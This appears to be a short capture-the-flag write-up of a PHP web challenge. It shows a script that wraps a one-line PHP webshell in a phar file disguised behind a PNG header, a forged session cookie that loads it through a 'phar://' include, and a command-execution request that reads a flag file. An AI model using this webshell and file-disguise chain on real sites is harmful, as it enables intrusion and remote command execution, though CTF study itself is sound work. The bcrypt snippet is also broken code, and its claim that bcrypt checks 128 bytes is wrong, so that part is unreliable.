- bypass finfo and bypass image size
- Upload 0x10 header of PNG, size bypassed.
Payload: https://up.harold.kim/cvTUpPhrieW54Anu
- Flag: HarekazeCTF{seikai_wa_hitotsu!janai!!}
- We take the first file payload and save it into a.png.
- Generate exploit phar file for attack.
<?php
$a = fread(fopen("a.png","rb"), filesize("a.png")) . str_repeat("\x00", 32);
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('exploit.css', '<?php @var_dump($_GET[1]($_GET[2])); ?>');
$phar->setStub($a . '<?php __HALT_COMPILER(); ? >');
//$phar->setMetadata($obj);
$phar->stopBuffering();
?>
- Upload generated phar file.
http://153.127.202.154:1002/uploads/64f3139f.png
- upload flag1
- You receive session with flag1 on flash.
session=eyJuYW1lIjoiU1RZUFJTVFlQUlNUWVBSQSIsImZsYXNoIjp7InR5cGUiOiJlcnJvciIsIm1lc3NhZ2UiOiJXaGF0IGhhcHBlbmVkLi4uPyBPSywgdGhlIGZsYWcgZm9yIHBhcnQgMSBpczogPGNvZGU-SGFyZWthemVDVEZ7c2Vpa2FpX3dhX2hpdG90c3UhamFuYWkhIX08XC9jb2RlPiJ9fQ.JDJ5JDEwJHA1dWg0Njlia2N5bjZvL1p6aVdKNnVrQUxTckJKLkQwelVmUG1qTTZ2akVpc3hLNDFFU0hX
Now we modify theme with uploaded file from (3) {"name":"STYPRSTYPRSTYPRA","flash":{"type":"error","message":"What happened...? OK, the flag for part 1 is: <code>HarekazeCTF{seikai_wa_hitotsu!janai!!}<\/code>"}, "theme": "phar://./uploads/64f3139f.png/exploit"}
- This works due to the crypt() with default bcrypt spec., the check size is limited. Considering that we have a long secret, we can just add the plaintext at the end of session text and
password_verify
is bypassed.
$a = password_hash(str_repeat("A"*128, PASSWORD_BCRYPT);
var_dump(password_verify(str_repeat("A"*256), $a)); // true, because it only checks first 128 byte
- Set cookie.
document.cookie="session=eyJuYW1lIjoiU1RZUFJTVFlQUlNUWVBSQSIsImZsYXNoIjp7InR5cGUiOiJlcnJvciIsIm1lc3NhZ2UiOiJXaGF0IGhhcHBlbmVkLi4uPyBPSywgdGhlIGZsYWcgZm9yIHBhcnQgMSBpczogPGNvZGU-SGFyZWthemVDVEZ7c2Vpa2FpX3dhX2hpdG90c3UhamFuYWkhIX08XC9jb2RlPiJ9LCAidGhlbWUiOiAicGhhcjovLy4vdXBsb2Fkcy82NGYzMTM5Zi5wbmcvZXhwbG9pdCJ9" +".JDJ5JDEwJHA1dWg0Njlia2N5bjZvL1p6aVdKNnVrQUxTckJKLkQwelVmUG1qTTZ2akVpc3hLNDFFU0hX";
- access http://153.127.202.154:1002/?1=system&2=cat+/flag2-dea5b73356499c78
...
vertical-align: middle;
}
/* light/dark.css */
HarekazeCTF{lfi_with_phar_is_fun}
string(33) "HarekazeCTF{lfi_with_phar_is_fun}"
/**/
</style>
...
I thought too deep, instead I also bypassed with zip:// too. orz